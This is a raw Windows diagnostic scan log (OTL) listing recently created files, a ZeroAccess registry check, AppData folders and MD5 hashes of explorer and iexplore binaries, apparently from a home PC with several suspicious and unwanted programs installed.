========== Files Created - No Company Name ==========

[2014/05/30 10:47:49 | 000,045,581 | ---- | C] () -- C:\Users\Owner\Documents\mwb-error-2.png

[2014/05/30 10:46:12 | 000,040,689 | ---- | C] () -- C:\Users\Owner\Documents\mwb-error.png

[2014/05/30 10:30:32 | 000,032,512 | ---- | C] () -- C:\Windows\SysNative\drivers\hitmanpro37.sys

[2014/05/30 08:25:29 | 000,001,889 | ---- | C] () -- C:\Users\Public\Desktop\HitmanPro.lnk

[2014/05/26 13:12:20 | 000,001,049 | ---- | C] () -- C:\Users\Owner\Desktop\360 Total Security.lnk

[2014/05/26 03:21:01 | 000,000,444 | ---- | C] () -- C:\Windows\tasks\SpeedyPC Registration3.job

[2014/05/26 03:20:49 | 000,001,197 | ---- | C] () -- C:\Users\Owner\Desktop\SpeedyPC Pro.lnk

[2014/05/26 03:20:49 | 000,000,571 | ---- | C] () -- C:\Windows\tasks\SpeedyPC Pro_sch_A41C6437-E4AE-11E3-9423-0026188D9465.job

[2014/05/26 03:20:49 | 000,000,464 | ---- | C] () -- C:\Windows\tasks\SpeedyPC Update Version3_triggeronce.job

[2014/05/26 03:20:49 | 000,000,464 | ---- | C] () -- C:\Windows\tasks\SpeedyPC Update Version3.job

[2014/05/26 01:39:14 | 000,001,077 | ---- | C] () -- C:\Users\Owner\Desktop\DllTool.lnk

[2014/05/26 00:31:51 | 000,000,510 | ---- | C] () -- C:\Windows\tasks\SUPERAntiSpyware Scheduled Task e1800e5a-718e-492b-81f8-0f6a2e27702e.job

[2014/05/26 00:31:51 | 000,000,510 | ---- | C] () -- C:\Windows\tasks\SUPERAntiSpyware Scheduled Task 21055d1e-66ba-4203-943b-3df24c22fd8c.job

[2014/05/25 20:30:41 | 000,000,841 | ---- | C] () -- C:\Users\Public\Desktop\LogMeIn Hamachi.lnk

[2014/05/25 19:55:13 | 000,723,544 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\msconfig.ini

[2014/05/25 19:24:25 | 000,000,468 | -H-- | C] () -- C:\Windows\tasks\SO.Booster-S-603818780.job

[2014/05/25 19:23:08 | 004,210,176 | ---- | C] () -- C:\Program Files (x86)\SO_x64.Booster

[2014/05/25 19:23:08 | 000,174,928 | ---- | C] () -- C:\Program Files (x86)\SOSvc.dll

[2014/05/25 19:23:07 | 004,296,192 | ---- | C] () -- C:\Program Files (x86)\SO.Booster

[2014/05/25 15:41:24 | 000,001,123 | ---- | C] () -- C:\Users\Public\Desktop\Easy Auto Clicker.lnk

[2014/05/22 16:26:59 | 000,372,109 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\trolltest.sfx.exe

[2014/05/22 16:26:59 | 000,000,035 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\um.bat

[2014/05/22 16:26:56 | 000,426,834 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\Bypasss.exe

[2014/05/15 22:35:11 | 000,000,050 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\install.imp

[2014/05/03 16:09:37 | 000,002,046 | -H-- | C] () -- C:\Users\Owner\Documents\Default.rdp

[2014/05/03 14:37:00 | 000,001,143 | ---- | C] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk

[2014/05/03 14:36:59 | 000,001,155 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk

[2014/05/01 20:52:38 | 000,002,295 | ---- | C] () -- C:\Users\Owner\Desktop\Chrome App Launcher.lnk

[2014/05/01 20:20:31 | 000,001,813 | ---- | C] () -- C:\Users\Owner\Desktop\MultiBit 0.5.18.lnk

[2014/04/19 22:12:33 | 000,645,632 | ---- | C] () -- C:\Windows\SysWow64\xvidcore.dll

[2014/04/19 22:12:33 | 000,240,640 | ---- | C] () -- C:\Windows\SysWow64\xvidvfw.dll

[2014/03/29 15:50:56 | 001,816,064 | ---- | C] () -- C:\Windows\SysWow64\libmysql_e.dll

[2013/11/16 01:15:12 | 000,000,600 | ---- | C] () -- C:\Users\Owner\AppData\Local\PUTTY.RND

[2013/10/03 21:58:42 | 000,000,441 | ---- | C] () -- C:\Users\Owner\AppData\Local\UserProducts.xml

[2013/08/05 01:15:08 | 000,066,104 | ---- | C] () -- C:\Windows\SysWow64\bdmpegv.dll

[2013/08/05 01:15:06 | 000,023,080 | ---- | C] () -- C:\Windows\SysWow64\bdmjpeg.dll

[2013/05/05 14:47:47 | 000,000,064 | ---- | C] () -- C:\Windows\GPlrLanc.dat

[2013/04/10 17:49:13 | 000,281,872 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrB.exe

[2013/04/10 17:48:50 | 000,076,888 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrA.exe

[2013/04/10 17:48:46 | 003,130,440 | ---- | C] () -- C:\Windows\SysWow64\pbsvc_blr.exe

[2012/12/28 16:04:22 | 000,036,352 | ---- | C] () -- C:\Windows\SysWow64\xfcodec.dll

[2012/11/28 15:17:24 | 000,030,568 | ---- | C] () -- C:\Windows\MusiccityDownload.exe

[2012/11/28 15:17:18 | 000,974,848 | ---- | C] () -- C:\Windows\SysWow64\cis-2.4.dll

[2012/11/28 15:17:18 | 000,081,920 | ---- | C] () -- C:\Windows\SysWow64\issacapi_bs-2.3.dll

[2012/11/28 15:17:18 | 000,065,536 | ---- | C] () -- C:\Windows\SysWow64\issacapi_pe-2.3.dll

[2012/11/28 15:17:18 | 000,057,344 | ---- | C] () -- C:\Windows\SysWow64\issacapi_se-2.3.dll

[2012/10/13 18:19:01 | 003,117,057 | ---- | C] () -- C:\Windows\SysWow64\drivers\EagleNT.sys

[2012/06/25 13:32:04 | 000,004,096 | ---- | C] () -- C:\Windows\d3dx.dat

[2012/05/25 20:58:35 | 000,000,040 | ---- | C] () -- C:\Users\Owner\jagex_cl_runescape_LIVE.dat

[2012/02/02 18:44:17 | 000,002,612 | ---- | C] () -- C:\ProgramData\repository.xml

[2011/12/29 20:39:25 | 000,000,032 | R--- | C] () -- C:\ProgramData\hash.dat

[2011/10/06 20:39:05 | 000,000,632 | RHS- | C] () -- C:\Users\Owner\ntuser.pol

[2011/08/25 03:33:32 | 000,000,258 | RHS- | C] () -- C:\ProgramData\ntuser.pol

[2011/06/08 09:32:58 | 000,001,940 | ---- | C] () -- C:\Users\Owner\AppData\Local\{96C87F53-AC72-4604-A9CC-186A49F17F3C}.ini

[2011/02/01 19:26:33 | 000,000,129 | ---- | C] () -- C:\Users\Owner\jagex_runescape_preferences2.dat

[2011/02/01 19:25:51 | 000,000,034 | ---- | C] () -- C:\Users\Owner\jagex_runescape_preferences.dat

[2010/12/04 12:41:22 | 230,797,822 | ---- | C] () -- C:\Program Files (x86)\Adobe Flash CS4.rar

[2010/11/06 10:11:27 | 242,254,547 | ---- | C] () -- C:\Program Files (x86)\Adobe Illustrator CS4.rar

[2010/08/06 14:55:30 | 000,002,052 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\wklnhst.dat

[2010/06/18 14:13:05 | 000,000,020 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\colthy

[2010/06/08 18:36:58 | 000,025,088 | ---- | C] () -- C:\Users\Owner\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

[2006/07/15 11:23:29 | 000,502,126 | -H-- | C] () -- C:\Users\Owner\AppData\Roaming\Ownerv1.18.0 - Trial versionlog.dat

[2005/06/08 01:33:39 | 000,043,850 | -H-- | C] () -- C:\Users\Owner\AppData\Roaming\Ownerlog.dat

========== ZeroAccess Check ==========

[2009/07/13 23:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

"" = C:\Windows\SysNative\shell32.dll -- [2014/03/24 21:43:12 | 014,175,744 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

"" = %SystemRoot%\system32\shell32.dll -- [2014/03/24 21:09:54 | 012,874,240 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64

"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 20:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]

"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 07:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64

"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 20:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

========== LOP Check ==========

[2014/03/29 14:57:58 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\ Angry_Birds

[2012/10/21 18:22:42 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\.minecraft

[2010/04/01 21:48:03 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\acccore

[2014/04/04 19:11:26 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\AVG2014

[2012/12/24 13:38:08 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Azureus

[2012/07/23 13:13:33 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\BANDISOFT

[2013/11/30 21:20:43 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Charles

[2011/01/01 13:18:57 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\com.comcast.callerid.13A1FA90F0FC9DC009FB0956ADD0F13F8608561B.1

[2012/01/28 18:17:12 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\com.w3i.FlipToast

[2012/01/28 22:29:25 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\ConsumerSoft

[2014/05/30 04:33:59 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\dclogs

[2014/05/26 03:20:57 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\DriverCure

[2012/02/25 22:40:02 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\ExpressFiles

[2013/11/29 20:52:20 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\eXtremeSenses

[2010/11/11 15:36:04 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Farm Mania

[2012/09/22 15:14:34 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\FOG Downloader

[2014/05/26 05:18:37 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\GameMaker

[2011/09/14 13:57:56 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\GetRightToGo

[2011/07/18 08:09:41 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\go

[2014/04/13 11:55:37 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Gordonsys 2.0

[2013/05/05 14:48:51 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\InstallX, LLC

[2013/08/04 22:29:55 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\intle®

[2011/08/13 03:29:47 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\iTripoli

[2012/05/05 14:41:21 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\iWin

[2012/07/20 12:03:34 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\join.me

[2014/05/26 01:39:19 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\KSafe

[2013/05/02 13:02:31 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\LaBook

[2010/07/12 18:15:18 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Ludia

[2014/05/26 05:18:37 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\ManyCam

[2012/03/24 09:02:49 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Moonchild Productions

[2012/02/26 09:37:16 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Motorola

[2014/05/27 08:08:04 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\MultiBit

[2011/05/09 20:09:50 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\My Games

[2010/10/14 08:45:59 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\NCH Swift Sound

[2013/05/26 19:15:07 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Notepad++

[2013/01/18 13:36:37 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\npm

[2011/02/26 21:43:09 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Oberon Media

[2012/06/25 13:32:03 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\onverse

[2013/06/01 22:13:34 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\ooVoo Details

[2013/03/04 18:58:27 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Open Download Manager

[2013/07/24 01:27:25 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Opera

[2014/05/26 13:17:25 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Panda Security

[2012/02/02 18:47:58 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\PerformerSoft

[2014/05/18 18:44:34 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\PhrozenSoft

[2010/03/29 19:00:37 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\PictureMover

[2010/11/11 15:41:50 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\PlayFirst

[2011/05/08 17:18:48 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\PopCapv1000

[2012/07/01 17:03:46 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Rovio

[2013/08/03 18:57:10 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Screaming Bee

[2012/06/26 11:01:33 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\SecondLife

[2010/04/04 06:12:48 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Skinux

[2014/05/27 08:08:03 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Smilebox

[2012/12/26 22:39:32 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Solveig Multimedia

[2014/05/26 03:20:57 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\SpeedyPC Software

[2011/05/08 15:09:42 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\SpinTop

[2013/01/01 21:26:51 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\SplitMediaLabs

[2014/05/26 13:21:04 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Spotify

[2013/01/07 20:00:16 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Strongvault

[2013/12/15 20:07:00 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Sublime Text 2

[2013/07/29 01:24:29 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\SYSTEMAX Software Development

[2014/05/30 09:13:20 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\TeamViewer

[2010/08/06 14:55:35 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Template

[2014/05/26 05:19:38 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\TightVNC

[2011/01/14 17:44:00 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\tmp

[2014/05/22 19:21:12 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\TS3Client

[2014/04/04 19:11:08 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\TuneUp Software

[2014/05/26 05:18:21 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\TuneUpMedia

[2011/02/18 18:50:54 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Unity

[2014/05/30 10:49:39 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\uTorrent

[2010/03/30 18:24:26 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\WinBatch

========== Purity Check ==========

========== Custom Scans ==========

< %USERPROFILE%\..|smtmp;true;true;true /FP >

< %temp%\smtmp\*.* /s > >

< MD5 for: EXPLORER.ADML >

[2009/07/13 21:30:02 | 000,003,695 | ---- | M] () MD5=7A4C7F3CB156543113596988479CAFCE -- C:\Windows\winsxs\amd64_microsoft-windows-s..ouppolicy.resources_31bf3856ad364e35_6.1.7600.16385_en-us_7ef5713984067904\Explorer.adml

< MD5 for: EXPLORER.ADMX >

[2009/06/10 15:53:55 | 000,003,836 | ---- | M] () MD5=AD131A834808E6AFF4A3918DE05BFCF6 -- C:\Windows\winsxs\amd64_microsoft-windows-shell-grouppolicy_31bf3856ad364e35_6.1.7600.16385_none_71af9b5b0a86e6b7\Explorer.admx

< MD5 for: EXPLORER.EX_ >

[2002/08/29 14:00:00 | 000,351,603 | ---- | M] () MD5=2690171B51B4DBA59C02E89DB7FE6C9B -- C:\Old Computer\EXPLORER.EX_

< MD5 for: EXPLORER.EXE >

[2011/02/26 01:23:14 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=0862495E0C825893DB75EF44FAEA8E93 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16768_none_adc24107935a7e25\explorer.exe

[2011/02/26 00:19:21 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=0FB9C74046656D1579A64660AD67B746 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_ba87e574ddfe652d\explorer.exe

[2009/07/13 20:14:20 | 002,613,248 | ---- | M] (Microsoft Corporation) MD5=15BC38A7492BEFE831966ADB477CF76F -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16385_none_b7fe430bc7ce3761\explorer.exe

[2011/02/26 00:51:13 | 002,614,784 | ---- | M] (Microsoft Corporation) MD5=255CF508D7CFB10E0794D6AC93280BD8 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20910_none_b8ce9756e0b786a4\explorer.exe

[2009/10/31 00:45:39 | 002,614,272 | ---- | M] (Microsoft Corporation) MD5=2626FC9755BE22F805D3CFA0CE3EE727 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16450_none_b819b343c7ba6202\explorer.exe

[2011/02/26 00:33:07 | 002,614,784 | ---- | M] (Microsoft Corporation) MD5=2AF58D15EDC06EC6FDACCE1F19482BBF -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16768_none_b816eb59c7bb4020\explorer.exe

[2011/02/25 01:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\ERDNT\cache86\explorer.exe

[2011/02/25 01:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\explorer.exe

[2011/02/25 01:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_afa79dc39081d0ba\explorer.exe

[2011/02/26 01:14:34 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=3B69712041F3D63605529BD66DC00C48 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_b0333b22a99da332\explorer.exe

[2010/11/20 07:17:09 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=40D777B7A95E00593EB1568C68514493 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_ba2f56d3c4bcbafb\explorer.exe

[2009/08/03 01:19:07 | 002,868,224 | ---- | M] (Microsoft Corporation) MD5=700073016DAC1C3D2E7E2CE4223334B6 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20500_none_ae84b558ac4eb41c\explorer.exe

[2007/06/13 06:26:03 | 001,033,216 | ---- | M] (Microsoft Corporation) MD5=7712DF0CDDE3A5AC89843E61CD5B3658 -- C:\Old Computer\explorer.exe

[2011/02/25 00:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\SysWOW64\explorer.exe

[2011/02/25 00:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_b9fc4815c4e292b5\explorer.exe

[2009/10/31 01:34:59 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=9AAAEC8DAC27AA17B053E6352AD233AE -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16450_none_adc508f19359a007\explorer.exe

[2009/08/03 00:49:47 | 002,613,248 | ---- | M] (Microsoft Corporation) MD5=9FF6C4C91A3711C0A3B18F87B08B518D -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20500_none_b8d95faae0af7617\explorer.exe

[2010/11/20 08:24:45 | 002,872,320 | ---- | M] (Microsoft Corporation) MD5=AC4C51EB24AA95B77F705AB159189E24 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_afdaac81905bf900\explorer.exe

[2009/10/31 01:38:38 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=B8EC4BD49CE8F6FC457721BFC210B67F -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20563_none_ae46d6aeac7ca7c7\explorer.exe

[2009/08/03 00:35:50 | 002,613,248 | ---- | M] (Microsoft Corporation) MD5=B95EEB0F4E5EFBF1038A35B3351CF047 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16404_none_b853c407c78e3ba9\explorer.exe

[2009/07/13 20:39:10 | 002,868,224 | ---- | M] (Microsoft Corporation) MD5=C235A51CB740E45FFA0EBFB9BAFCDA64 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16385_none_ada998b9936d7566\explorer.exe

[2009/10/31 01:00:51 | 002,614,272 | ---- | M] (Microsoft Corporation) MD5=C76153C7ECA00FA852BB0C193378F917 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20563_none_b89b8100e0dd69c2\explorer.exe

[2011/02/26 01:26:45 | 002,870,784 | ---- | M] (Microsoft Corporation) MD5=E38899074D4951D31B4040E994DD7C8D -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20910_none_ae79ed04ac56c4a9\explorer.exe

[2009/08/03 01:17:37 | 002,868,224 | ---- | M] (Microsoft Corporation) MD5=F170B4A061C9E026437B193B4D571799 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16404_none_adff19b5932d79ae\explorer.exe

< MD5 for: EXPLORER.EXE.000 >

[2004/08/04 02:56:49 | 001,032,192 | ---- | M] (Microsoft Corporation) MD5=A0732187050030AE399B241436565E64 -- C:\Old Computer\explorer.exe.000

< MD5 for: EXPLORER.EXE.656.DMP >

[2014/05/30 11:02:29 | 002,745,784 | ---- | M] () MD5=9A3402E40E4FD492CC2E321DBC5792B1 -- C:\Users\Owner\AppData\Local\CrashDumps\explorer.exe.656.dmp

< MD5 for: EXPLORER.EXE.MUI >

[2009/07/13 21:06:56 | 000,022,016 | ---- | M] (Microsoft Corporation) MD5=B9F4B1CA23D60775736059D72BA48526 -- C:\Windows\SysWOW64\en-US\explorer.exe.mui

[2009/07/13 21:06:56 | 000,022,016 | ---- | M] (Microsoft Corporation) MD5=B9F4B1CA23D60775736059D72BA48526 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer.resources_31bf3856ad364e35_6.1.7600.16385_en-us_6c3c2316c1b39396\explorer.exe.mui

[2009/07/13 21:26:48 | 000,022,016 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5 -- C:\Windows\en-US\explorer.exe.mui

[2009/07/13 21:26:48 | 000,022,016 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer.resources_31bf3856ad364e35_6.1.7600.16385_en-us_61e778c48d52d19b\explorer.exe.mui

< MD5 for: EXPLORER.EXE-02121B1A.PF >

[2009/09/27 22:55:45 | 000,095,436 | ---- | M] () MD5=949311AEFEE9C93B63CEC4B3B2FA976D -- C:\Old Computer\EXPLORER.EXE-02121B1A.pf

< MD5 for: EXPLORER.EXE-7A3328DA.PF >

[2014/05/30 10:30:34 | 000,271,726 | ---- | M] () MD5=177EC97170AD80FDE1C3CAD39CBA149E -- C:\Windows\Prefetch\EXPLORER.EXE-7A3328DA.pf

< MD5 for: EXPLORER.SC_ >

[2002/08/29 14:00:00 | 000,000,181 | ---- | M] () MD5=BC5B38879C56DFBC05C8B5C43AC4D739 -- C:\Old Computer\EXPLORER.SC_

< MD5 for: EXPLORER.SCF >

[2002/08/29 07:00:00 | 000,000,080 | ---- | M] () MD5=A3975A7D2C98B30A2AE010754FFB9392 -- C:\Old Computer\explorer.scf

< MD5 for: IEXPLORE.CH_ >

[2002/08/29 14:00:00 | 000,161,725 | ---- | M] () MD5=D94018D849BDF25E7ADB8CD46DA3DC7F -- C:\Old Computer\IEXPLORE.CH_

< MD5 for: IEXPLORE.CHM >

[2004/07/17 13:40:16 | 000,204,810 | ---- | M] () MD5=60858526AAD1CC55F5F0055B8E3B66FE -- C:\Old Computer\iexplore.chm

< MD5 for: IEXPLORE.EX_ >

[2002/08/29 14:00:00 | 000,036,925 | ---- | M] () MD5=BAC737FDAA9B648A6EBFF76BFAEC7501 -- C:\Old Computer\IEXPLORE.EX_

< MD5 for: IEXPLORE.EXE >

[2012/06/02 06:47:54 | 000,754,808 | ---- | M] (Microsoft Corporation) MD5=004640AB259C1572EBD5FB0A32F63686 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.20553_none_0dbfc836999db0ca\iexplore.exe

[2013/01/08 20:53:45 | 000,763,424 | ---- | M] (Microsoft Corporation) MD5=0100BCF23941C83462E4A70F94C3392E -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.16464_none_0d2c5bc980874648\iexplore.exe

[2012/05/17 18:21:54 | 000,748,664 | ---- | M] (Microsoft Corporation) MD5=0129BB16161C2FD9A6B19111AB047198 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.16446_none_1798a687b4d6030f\iexplore.exe

[2014/03/07 20:59:00 | 000,811,728 | ---- | M] (Microsoft Corporation) MD5=0667ED9F8E905E1F73DB60ACCEDCBCA7 -- C:\Program Files (x86)\Internet Explorer\iexplore.exe

[2014/03/07 20:59:00 | 000,811,728 | ---- | M] (Microsoft Corporation) MD5=0667ED9F8E905E1F73DB60ACCEDCBCA7 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.2.9600.17041_none_858ffb5bf711c81f\iexplore.exe

[2013/11/20 04:04:34 | 000,804,560 | ---- | M] (Microsoft Corporation) MD5=0685765C0CBE095BA0C6C8790BAE21EF -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.2.9600.16428_none_7b0d6f67c2d3f97a\iexplore.exe

